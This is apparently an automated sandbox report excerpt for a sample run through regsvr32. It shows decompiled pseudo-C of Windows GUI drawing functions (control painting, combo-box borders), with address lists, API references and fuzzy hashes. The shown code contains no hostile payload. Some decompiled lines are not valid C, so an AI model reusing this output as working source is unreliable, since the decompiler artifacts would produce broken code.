				_t57 =  *0x3e221c; // 0x0
				return E003C79D0(_v20, _v12,  *_t49, _v8,  *((intOrPtr*)(_t57 + 0x58)), _v16);
			}

0x003c9b52
0x003c9b59
0x003c9b60
0x003c9b67
0x003c9b6e
0x003c9b75
0x003c9b7c
0x003c9b83
0x003c9b8a
0x003c9b91
0x003c9b98
0x003c9b9f
0x003c9ba6
0x003c9bad
0x003c9bbd
0x003c9bc6
0x003c9bcb
0x003c9bd2
0x003c9bd6
0x003c9bdd
0x003c9be4
0x003c9beb
0x003c9bef
0x003c9bf6
0x003c9bfd
0x003c9c01
0x003c9c08
0x003c9c0f
0x003c9c16
0x003c9c16
0x003c9c20
0x003c9c3c

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebdf98820c81ccdc61959ee75497046bc64c14f4e644b0f7d62eebaf904f96
Instruction ID: a0b08bec891743c987381073893824e5c98f45c01aed2d45fb6dbde6d24bc2c6
Opcode Fuzzy Hash: cbebdf98820c81ccdc61959ee75497046bc64c14f4e644b0f7d62eebaf904f96
Instruction Fuzzy Hash: 3F21CEB1C01318EBCF59DFA1D98A89EBBB1FB10308F20C189C91276265D7B54B5ADF40

Uniqueness

Uniqueness Score: -1.00%

Function 1002C5B0 Relevance: 55.9, APIs: 37, Instructions: 426
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1002C5B0(struct HWND__* _a4, struct HDC__* _a8) {
				signed int _v40;
				struct tagRECT _v296;
				char _v308;
				struct tagRECT _v324;
				struct tagRECT _v340;
				struct tagRECT _v356;
				long _v360;
				void* _v364;
				int _v368;
				int _v372;
				long _v376;
				int _v380;
				int _v384;
				signed int _v388;
				long _v396;
				void* _v400;
				signed int _t155;
				struct HWND__* _t157;
				void* _t163;
				signed int _t175;
				signed int _t176;
				void* _t185;
				signed int _t200;
				intOrPtr* _t201;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t211;
				struct HWND__* _t218;
				struct HDC__* _t219;
				signed int _t225;

				_t218 = _a4;
				_t155 = GetWindowLongA(_t218, 0xfffffff0);
				_t200 = _t155 & 0x0000001f;
				_v324.left = _t155 & 0x00000020;
				_t157 = GetParent(_t218);
				_t219 = _a8;
				_v340.bottom = _t157;
				SetBkMode(_t219, 2);
				GetClientRect(_t218,  &_v296);
				_t211 =  &_v296;
				_t201 =  &(_v324.bottom);
				 *_t201 =  *_t211;
				 *((intOrPtr*)(_t201 + 4)) = _v296.top;
				 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)(_t211 + 8));
				 *((intOrPtr*)(_t201 + 0xc)) =  *((intOrPtr*)(_t211 + 0xc));
				_t163 = SendMessageA(_t218, 0x31, 0, 0);
				_v356.right = _t163;
				if(_t163 != 0) {
					_v356.left = SelectObject(_t219, _t163);
				}
				SetBkColor(_t219, GetSysColor(0xf));
				SetTextColor(_t219, GetSysColor(0x12));
				_v356.bottom = SelectObject(_t219, SendMessageA(_v356.top, 0x135, _t219, _t218));
				IntersectClipRect(_t219, _v340.top, _v340.right, _v340.bottom, _v324.left);
				_t225 = _v40;
				if((_t225 & 0x00000010) != 0 && _t200 != 7) {
					PatBlt(_t219, _v356.left, _v356.top, _v356.right - _v356.left, _v356.bottom - _v356.top, 0xf00021);
				}
				_v368 = IsWindowEnabled(_t218);
				_t175 = SendMessageA(_t218, 0xf2, 0, 0);
				_v384 = 0;
				_t204 = _t175 & 0x00000003;
				_v360 = _t204;
				asm("sbb ecx, ecx");
				_t176 = _t175 & 0x00000004;
				_t205 = _t204 + 1;
				_v324.left = _t176;
				_v388 = ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205) + ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205);
				if(_v368 == 0) {
					_v388 = _v388 + ((_t205 + 2 << 3) - _t205 + 2) * 2;
				}
				if((_t225 & 0x0000000a) != 0 || _t200 == 0 || _t200 == 1) {
					_v372 = GetWindowTextA(_t218,  &_v308, 0x100);
				}
				if(_t200 > 9) {
					L45:
					_t185 = SelectObject(_t219, _v364);
					if(_v400 != 0) {
						return SelectObject(_t219, _v400);
					}
					return _t185;
				} else {
					switch( *((intOrPtr*)(_t200 * 4 +  &M1002CAD4))) {
						case 0:
							_push(_v324.left);
							_push(_t200);
							_push(_v372);
							_push( &_v308);
							_push( &_v340);
							_push(_t219);
							_push(_t218);
							E1002C270(_t238);
							goto L45;
						case 1:
							L15:
							__eflags = __ebp & 0x00000004;
							if((__ebp & 0x00000004) != 0) {
								__edi = CreateCompatibleDC(__esi);
								__eflags = __edi;
								if(__edi != 0) {
									__eax =  *0x10096d70; // 0x0
									__ebx = __eax;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = _v396;
										_push(0xcc0020);
										__ecx = _v400;
										_push(_v396);
										__eax = _v356.left;
										_push(_v400);
										__eflags = _v388;
										_push(__edi);
										_push(0xd);
										_push(0xe);
										if(_v388 == 0) {
											__eax = __eax - _v364;
											__ecx = _v364;
											__eax = __eax - 0xd;
											asm("cdq");
											__eax = __eax - __edx;
											__ecx = _v364 + __eax;
											__eflags = __ecx;
											__eax = _v368;
											_push(__ecx);
										} else {
											__eax = __eax - _v364;
											__ecx = _v364;
											__eax = __eax - 0xd;
											asm("cdq");
											__eax = __eax - __edx;
											__ecx = _v364 + __eax;
											__eax = _v360;
											_push(__ecx);
											__eax = _v360 - 0xe;
										}
										__eax = SelectObject(__edi, __ebx);
									}
									__eax = DeleteDC(__edi);
								}
							}
							__eflags = __ebp & 0x00000002;
							if((__ebp & 0x00000002) != 0) {
								__eflags = _v376;
								if(_v376 == 0) {
									__eax = _v340.left;
									__eax = _v340.left + 0x12;
									__eflags = __eax;
									_v356.left = __eax;
								} else {
									_v340.right = _v340.right - 0x12;
									_v356.right = _v340.right - 0x12;
								}
								__eflags = _v368;
								if(_v368 == 0) {
									__eax =  *0x10096d5c; // 0x0
									__eax = SetTextColor(__esi, __eax);
								}
								__eax =  &_v356;
								__ecx = _v372;
								__edx =  &_v308;
								__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x24);
							}
							__eflags = __ebp & 0x00000008;
							if((__ebp & 0x00000008) != 0) {
								__eax =  &_v360;
								__ecx =  &_v324;
								__edx =  &_v308;
								_push( &_v360);
								_push( &_v324);
								E1002A860(__esi,  &_v308) = _v356.bottom;
								_v356.bottom - _v356.top = _v356.bottom - _v356.top - _v360;
								asm("cdq");
								_v356.bottom - _v356.top - _v360 - __edx = _v356.bottom - _v356.top - _v360 - __edx >> 1;
								_v356.top = _v356.bottom - _v356.top - _v360 - __edx >> 1;
								_v360 = _v360 + _v356.top;
								__eflags = _v376;
								_v356.bottom = _v360 + _v356.top;
								__eax = _v340.left;
								if(_v376 == 0) {
									__eax = __eax + 0x12;
									__eflags = __eax;
									_v356.left = __eax;
								} else {
									_v340.right = _v340.right - 0x12;
									_v356.left = __eax;
								}
								__eax = _v324.left;
								__eax = _v324.left + _v356.left;
								__eflags = __eax;
								__ecx =  &_v356;
								_v356.right = __eax;
								__eax = InflateRect( &_v356, 1, 1);
								__ecx =  &_v340;
								__eax = IntersectRect( &_v356,  &_v356,  &_v340);
								__ecx =  &_v356;
								__eax = DrawFocusRect(__esi,  &_v356);
							}
							goto L45;
						case 2:
							_v384 = 0xd;
							goto L15;
						case 3:
							__eflags = _v360 - 2;
							if(_v360 == 2) {
								_v384 = 0x1a;
							}
							goto L15;
						case 4:
							__eflags = __ebp & 0x00000006;
							if((__ebp & 0x00000006) == 0) {
								goto L45;
							} else {
								__eax =  &_v376;
								__ecx =  &_v360;
								__edx =  &_v308;
								_push( &_v376);
								_push( &_v360);
								__eax = E1002A860(__esi,  &_v308);
								__eflags = _v376;
								if(_v376 == 0) {
									__eax =  &_v376;
									__ecx =  &_v324;
									_push( &_v376);
									_push( &_v324);
									__eax = E1002A860(__esi, "X");
								}
								_v356.left = _v356.left + 4;
								_v360 = _v360 + _v356.left;
								__eax = _v360 + _v356.left + 4;
								_v356.right = _v360 + _v356.left + 4;
								_v376 = _v376 + _v356.top;
								__eflags = __ebp & 0x00000020;
								_v356.bottom = _v376 + _v356.top;
								if((__ebp & 0x00000020) == 0) {
									__eax = _v376;
									_v340.right = _v340.right - 1;
									_v340.bottom = _v340.bottom - 1;
									_push(0xf);
									asm("cdq");
									__eax = _v376 - __edx;
									_push(2);
									__eax = _v376 - __edx >> 1;
									_v340.top = _v340.top + (_v376 - __edx >> 1);
									 &_v340 = E1002A670(__esi,  &_v340, 2);
									 &_v340 = OffsetRect( &_v340, 1, 1);
									__ecx =  &_v340;
									_push(0xf);
									_push(0);
									__eax = E1002A670(__esi,  &_v340, 0);
									__eflags = _v368;
									if(_v368 == 0) {
										__eax =  *0x10096d5c; // 0x0
										__eax = SetTextColor(__esi, __eax);
									}
									__eax =  &_v356;
									__ecx = _v372;
									__edx =  &_v308;
									__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x20);
									goto L45;
								} else {
									__ebx = _v356.top;
									__ebp = _v356.right;
									__ecx =  &_v356;
									__edx =  &_v324;
									__eax =  *__ecx;
									__edx->x =  *__ecx;
									__eax =  *(__ecx + 0xc);
									__ecx = _v340.right;
									__esi = ClientToScreen;
									__edx->y = _v356.top;
									 *(__edx + 8) = _v356.right;
									 *(__edx + 0xc) = __eax;
									_v324.right.x = _v340.right;
									__eax = ClientToScreen(__edi, __edx);
									__ecx =  &(_v324.right);
									ClientToScreen(__edi,  &(_v324.right)) =  &_v324;
									__ecx = _v380;
									__esi = ScreenToClient;
									__eax = ScreenToClient(_v380,  &_v324);
									__ecx =  &(_v324.right);
									_v380 = ScreenToClient(_v380,  &(_v324.right));
									__ecx =  &_v324;
									__edx = _v380;
									return InvalidateRect(_v380,  &_v324, 1);
								}
							}
							goto L48;
						case 5:
							goto L45;
					}
				}
				L48:
			}

0x1002c5ba
0x1002c5c4
0x1002c5d0
0x1002c5d9
0x1002c5dd
0x1002c5df
0x1002c5e8
0x1002c5ed
0x1002c5ff
0x1002c605
0x1002c609
0x1002c615
0x1002c61e
0x1002c621
0x1002c624
0x1002c627
0x1002c62d
0x1002c633
0x1002c63d
0x1002c63d
0x1002c64d
0x1002c659
0x1002c681
0x1002c698
0x1002c69a
0x1002c6a7
0x1002c6d0
0x1002c6d0
0x1002c6dd
0x1002c6eb
0x1002c6f1
0x1002c6fb
0x1002c6fe
0x1002c705
0x1002c707
0x1002c70a
0x1002c70b
0x1002c722
0x1002c726
0x1002c739
0x1002c739
0x1002c743
0x1002c75f
0x1002c75f
0x1002c766
0x1002caa9
0x1002caaf
0x1002caba
0x00000000
0x1002cac2
0x1002cad2
0x1002c76c
0x1002c76c
0x00000000
0x1002c77f
0x1002c784
0x1002c785
0x1002c786
0x1002c787
0x1002c788
0x1002c789
0x1002c78a
0x00000000
0x00000000
0x1002c79f
0x1002c79f
0x1002c7a5
0x1002c7b2
0x1002c7b4
0x1002c7b6
0x1002c7bc
0x1002c7c9
0x1002c7cb
0x1002c7cd
0x1002c7d3
0x1002c7d7
0x1002c7dc
0x1002c7e0
0x1002c7e1
0x1002c7e5
0x1002c7e6
0x1002c7eb
0x1002c7ec
0x1002c7ee
0x1002c7f0
0x1002c988
0x1002c98c
0x1002c990
0x1002c993
0x1002c994
0x1002c999
0x1002c999
0x1002c99b
0x1002c99f
0x1002c7f6
0x1002c7f6
0x1002c7fa
0x1002c7fe
0x1002c801
0x1002c802
0x1002c807
0x1002c809
0x1002c80d
0x1002c80e
0x1002c80e
0x1002c9aa
0x1002c9aa
0x1002c9b1
0x1002c9b1
0x1002c7b6
0x1002c9b7
0x1002c9bd
0x1002c9bf
0x1002c9c4
0x1002c9d3
0x1002c9d7
0x1002c9d7
0x1002c9da
0x1002c9c6
0x1002c9ca
0x1002c9cd
0x1002c9cd
0x1002c9de
0x1002c9e3
0x1002c9e5
0x1002c9ec
0x1002c9ec
0x1002c9f2
0x1002c9f8
0x1002c9fd
0x1002ca04
0x1002ca04
0x1002ca0a
0x1002ca10
0x1002ca16
0x1002ca1a
0x1002ca1e
0x1002ca22
0x1002ca23
0x1002ca2b
0x1002ca33
0x1002ca3a
0x1002ca3d
0x1002ca40
0x1002ca48
0x1002ca4c
0x1002ca51
0x1002ca55
0x1002ca59
0x1002ca66
0x1002ca66
0x1002ca69
0x1002ca5b
0x1002ca5b
0x1002ca60
0x1002ca60
0x1002ca6d
0x1002ca73
0x1002ca73
0x1002ca79
0x1002ca7d
0x1002ca82
0x1002ca88
0x1002ca97
0x1002ca9d
0x1002caa3
0x1002caa3
0x00000000
0x00000000
0x1002c797
0x00000000
0x00000000
0x1002c816
0x1002c81b
0x1002c81d
0x1002c81d
0x00000000
0x00000000
0x1002c82a
0x1002c830
0x00000000
0x1002c836
0x1002c836
0x1002c83a
0x1002c83e
0x1002c842
0x1002c843
0x1002c846
0x1002c84e
0x1002c853
0x1002c855
0x1002c859
0x1002c85d
0x1002c85e
0x1002c865
0x1002c86a
0x1002c86d
0x1002c876
0x1002c87a
0x1002c87d
0x1002c885
0x1002c889
0x1002c88f
0x1002c893
0x1002c90a
0x1002c90e
0x1002c912
0x1002c916
0x1002c918
0x1002c919
0x1002c91b
0x1002c91d
0x1002c922
0x1002c92c
0x1002c93d
0x1002c943
0x1002c947
0x1002c949
0x1002c94f
0x1002c957
0x1002c95c
0x1002c95e
0x1002c965
0x1002c965
0x1002c96b
0x1002c971
0x1002c976
0x1002c97d
0x00000000
0x1002c895
0x1002c895
0x1002c899
0x1002c89d
0x1002c8a1
0x1002c8a5
0x1002c8a7
0x1002c8a9
0x1002c8ac
0x1002c8b2
0x1002c8b8
0x1002c8bb
0x1002c8be
0x1002c8c1
0x1002c8c5
0x1002c8c7
0x1002c8cf
0x1002c8d3
0x1002c8d8
0x1002c8df
0x1002c8e1
0x1002c8eb
0x1002c8ed
0x1002c8f3
0x1002c909
0x1002c909
0x1002c893
0x00000000
0x00000000
0x00000000
0x00000000
0x1002c76c
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1002C5C4
GetParent.USER32(?), ref: 1002C5DD
SetBkMode.GDI32(?,00000002), ref: 1002C5ED
GetClientRect.USER32 ref: 1002C5FF
SendMessageA.USER32 ref: 1002C627
SelectObject.GDI32(?,00000000), ref: 1002C637

Part of subcall function 1002C270: InflateRect.USER32 ref: 1002C2B2
Part of subcall function 1002C270: IsWindowEnabled.USER32(?), ref: 1002C2C5
Part of subcall function 1002C270: InflateRect.USER32 ref: 1002C2EC
Part of subcall function 1002C270: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C303
Part of subcall function 1002C270: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C31C
Part of subcall function 1002C270: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C334
Part of subcall function 1002C270: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 1002C34E
Part of subcall function 1002C270: SelectObject.GDI32(?,00000000), ref: 1002C373

GetSysColor.USER32 ref: 1002C649
SetBkColor.GDI32(?,00000000), ref: 1002C64D
GetSysColor.USER32 ref: 1002C655
SetTextColor.GDI32(?,00000000), ref: 1002C659
SendMessageA.USER32 ref: 1002C66B
SelectObject.GDI32(?,00000000), ref: 1002C673
IntersectClipRect.GDI32(?,?,?,?,?), ref: 1002C698
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 1002C6D0
IsWindowEnabled.USER32(?), ref: 1002C6D7
SendMessageA.USER32 ref: 1002C6EB
GetWindowTextA.USER32(?,?,00000100), ref: 1002C759
SelectObject.GDI32(?,?), ref: 1002CAAF
SelectObject.GDI32(?,00000000), ref: 1002CAC2

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
String ID:
API String ID: 2549663215-0
Opcode ID: bd49f0e3cb97e633a6018ddb34af5b71148a2c1ae6ee1ae9a55891dfc1447fe1
Instruction ID: f718d1134dcf79d9da3aa4e81caea2fd31f8e776912cb1018dbeb22afe63345e
Opcode Fuzzy Hash: bd49f0e3cb97e633a6018ddb34af5b71148a2c1ae6ee1ae9a55891dfc1447fe1
Instruction Fuzzy Hash: D6F146B2508315AFE304DFA8CC88E6FB7E8FB89704F44491DF58586250E7B5EA45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1002CDE0 Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E1002CDE0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				struct tagRECT _v32;
				struct tagPOINT _v40;
				struct tagPOINT _v48;
				long _v52;
				long _v56;
				void* _v60;
				struct HWND__* _v64;
				signed int _v68;
				long _t73;
				signed int _t82;
				signed int _t84;
				int _t103;
				signed int _t118;
				struct HDC__* _t135;
				struct HWND__* _t144;
				struct HWND__* _t145;
				signed short _t146;
				long _t148;
				long _t150;
				signed int* _t153;
				signed int* _t154;

				_t153 =  &_v68;
				_t145 = _a4;
				_t73 = GetWindowLongA(_t145, 0xfffffff0);
				_v68 = _t73;
				if((_t73 & 0x10000000) == 0) {
					L33:
					return _t73;
				} else {
					if(_a12 != 3 || (_t73 & 0x00000003) != 3) {
						L4:
						if(_a8 != 0) {
							HideCaret(_t145);
						}
						GetWindowRect(_t145,  &_v48);
						_t144 = GetParent(_t145);
						ScreenToClient(_t144,  &_v48);
						_t146 = 0xf;
						ScreenToClient(_t144,  &_v40);
						_t135 = GetDC(_t144);
						_t82 = _v68 & 0x00100000;
						_v56 = _t82;
						if(_t82 != 0) {
							_t146 = 7;
						}
						_t84 = _v68 & 0x00200000;
						_v52 = _t84;
						if(_t84 != 0) {
							_t146 = _t146 & 0x0000fffb;
						}
						if(_a8 - GetWindowLongA(_t145, 0xfffffff4) != 0xfffffc18) {
							L24:
							E1002A7B0(_t175, _t135,  &_v48, _t146);
							_t154 =  &(_t153[3]);
							if(_a12 != 3 || (_v68 & 0x00000003) != 3) {
								__eflags = _v52;
								if(_v52 != 0) {
									_push(4);
									_v40.x = _v40.x + 1;
									_push(0);
									E1002A670(_t135,  &_v48, 0);
									_v40.x = _v40.x - 1;
									_v16 = _v48.x;
									_t150 = _v40.x - GetSystemMetrics(2);
									__eflags = _t150;
									_push(8);
									_push(7);
									_v48.x = _t150;
									E1002A670(_t135,  &_v48, 7);
									_v48.x = _v16;
									_t154 =  &(_t154[0xa]);
								}
								__eflags = _v56;
								if(_v56 != 0) {
									_push(8);
									_v40.y = _v40.y + 1;
									_push(0);
									E1002A670(_t135,  &_v48, 0);
									_v40.y = _v40.y - 1;
									_t148 = _v40.y - GetSystemMetrics(0x15);
									__eflags = _t148;
									_push(4);
									_push(7);
									_v48.y = _t148;
									E1002A670(_t135,  &_v48, 7);
								}
							} else {
								_t103 = GetSystemMetrics(2);
								_push(0xc);
								_push(7);
								_v48.x = _v40.x - _t103;
								E1002A670(_t135,  &_v48, 7);
								E1002C200(_t145);
							}
							_t73 = ReleaseDC(_t144, _t135);
							if(_a8 != 0) {
								return ShowCaret(_t145);
							}
							goto L33;
						} else {
							_v60 = 0x29a;
							_v32.left = SendMessageA(_t144, 0x1944, 0,  &_v60);
							if(_v60 == 0x29a) {
								_v32.left = SendMessageA(_t144, 0x1943, 0,  &_v60);
							}
							GetClassNameA(_t144,  &_v16, 0x10);
							if(lstrcmpA( &_v16, "ComboBox") == 0 || _v60 == 1 && _v32.left == 0x3eb) {
								_v64 = GetParent(_t144);
								MapWindowPoints(_t144, _v64,  &_v48, 2);
								ReleaseDC(_t144, _t135);
								_t135 = GetDC(_v64);
								if(_a8 == 0) {
									_t146 = _t146 & 0x0000fffd;
									_t41 =  &(_v48.y);
									 *_t41 = _v48.y + 1;
									__eflags =  *_t41;
									goto L23;
								} else {
									_t118 = GetWindowLongA(_t144, 0xfffffff0) & 0x00000003;
									if(_t118 == 2) {
										L20:
										__eflags = SendMessageA(_t144, 0x157, 0, 0);
										if(__eflags == 0) {
											goto L23;
										} else {
											ReleaseDC(_v64, _t135);
											return ShowCaret(_t145);
										}
									} else {
										_t175 = _t118 - 3;
										if(_t118 == 3) {
											goto L20;
										} else {
											_t146 = _t146 & 0x0000fff7;
											GetWindowRect(GetWindow(_t144, 5),  &_v32);
											_v40.x = _v40.x + _v32.left - _v32.right;
											E1002A7B0(_t175, _t135,  &_v48, 0x1008);
											_v40.x = _v40.x + _v32.right - _v32.left;
											_t153 =  &(_t153[3]);
											L23:
											_t144 = _v64;
											goto L24;
										}
									}
								}
							} else {
								goto L24;
							}
						}
					} else {
						_t73 = SendMessageA(_t145, 0x157, 0, 0);
						if(_t73 != 0) {
							goto L33;
						} else {
							goto L4;
						}
					}
				}
			}

0x1002cde0
0x1002cde5
0x1002cdee
0x1002cdf4
0x1002cdfd
0x1002d115
0x1002d115
0x1002ce03
0x1002ce08
0x1002ce28
0x1002ce2d
0x1002ce30
0x1002ce30
0x1002ce3c
0x1002ce49
0x1002ce57
0x1002ce5d
0x1002ce63
0x1002ce6c
0x1002ce72
0x1002ce77
0x1002ce7b
0x1002ce7d
0x1002ce7d
0x1002ce85
0x1002ce8a
0x1002ce8e
0x1002ce90
0x1002ce90
0x1002ceaa
0x1002d002
0x1002d009
0x1002d00e
0x1002d016
0x1002d056
0x1002d05b
0x1002d061
0x1002d063
0x1002d067
0x1002d06d
0x1002d076
0x1002d07e
0x1002d08d
0x1002d08d
0x1002d08f
0x1002d095
0x1002d097
0x1002d09f
0x1002d0a8
0x1002d0ac
0x1002d0ac
0x1002d0af
0x1002d0b4
0x1002d0ba
0x1002d0bc
0x1002d0c0
0x1002d0c6
0x1002d0cb
0x1002d0de
0x1002d0de
0x1002d0e0
0x1002d0e6
0x1002d0e8
0x1002d0f0
0x1002d0f5
0x1002d022
0x1002d028
0x1002d030
0x1002d036
0x1002d038
0x1002d040
0x1002d049
0x1002d04e
0x1002d0fa
0x1002d105
0x00000000
0x1002d108
0x00000000
0x1002ceb0
0x1002ceb0
0x1002ced3
0x1002ced7
0x1002ceec
0x1002ceec
0x1002cef8
0x1002cf10
0x1002cf32
0x1002cf43
0x1002cf4b
0x1002cf61
0x1002cf63
0x1002cff5
0x1002cffa
0x1002cffa
0x1002cffa
0x00000000
0x1002cf69
0x1002cf72
0x1002cf78
0x1002cfc6
0x1002cfd6
0x1002cfd8
0x00000000
0x1002cfda
0x1002cfe0
0x1002cff4
0x1002cff4
0x1002cf7a
0x1002cf7a
0x1002cf7d
0x00000000
0x1002cf7f
0x1002cf7f
0x1002cf93
0x1002cfaa
0x1002cfb0
0x1002cfbd
0x1002cfc1
0x1002cffe
0x1002cffe
0x00000000
0x1002cffe
0x1002cf7d
0x1002cf78
0x00000000
0x00000000
0x00000000
0x1002cf10
0x1002ce10
0x1002ce1a
0x1002ce22
0x00000000
0x00000000
0x00000000
0x00000000
0x1002ce22
0x1002ce08

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1002CDEE
SendMessageA.USER32 ref: 1002CE1A
HideCaret.USER32(?), ref: 1002CE30
GetWindowRect.USER32(?,?), ref: 1002CE3C
GetParent.USER32(?), ref: 1002CE43
ScreenToClient.USER32(00000000,?), ref: 1002CE57
ScreenToClient.USER32(00000000,?), ref: 1002CE63
GetDC.USER32(00000000), ref: 1002CE66
GetWindowLongA.USER32(?,000000F4), ref: 1002CE98
SendMessageA.USER32 ref: 1002CEC5
SendMessageA.USER32 ref: 1002CEE6
GetClassNameA.USER32(00000000,?,00000010), ref: 1002CEF8
lstrcmpA.KERNEL32(?,ComboBox), ref: 1002CF08
GetParent.USER32(00000000), ref: 1002CF2C
MapWindowPoints.USER32 ref: 1002CF43
ReleaseDC.USER32(00000000,00000000), ref: 1002CF4B
GetDC.USER32(?), ref: 1002CF56
GetWindowLongA.USER32(00000000,000000F0), ref: 1002CF6C
GetWindow.USER32(00000000,00000005), ref: 1002CF87
GetWindowRect.USER32(00000000,?), ref: 1002CF93
SendMessageA.USER32 ref: 1002CFD0
ReleaseDC.USER32(?,00000000), ref: 1002CFE0
ShowCaret.USER32(?), ref: 1002CFE7
GetSystemMetrics.USER32 ref: 1002D028
GetSystemMetrics.USER32 ref: 1002D087
GetSystemMetrics.USER32 ref: 1002D0D8
ReleaseDC.USER32(00000000,00000000), ref: 1002D0FA
ShowCaret.USER32(?), ref: 1002D108

Strings

ComboBox, xrefs: 1002CF02

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
String ID: ComboBox
API String ID: 930961256-1152790111
Opcode ID: 26ccfacde9f1cae0d056ced7eb065b413edcab3ee7976639f34822bed32c92f2
Instruction ID: 7d8a822c795a1e32e3d27bd7da92d7c23d16cab6e68dae79488b409e3180bb8e
Opcode Fuzzy Hash: 26ccfacde9f1cae0d056ced7eb065b413edcab3ee7976639f34822bed32c92f2
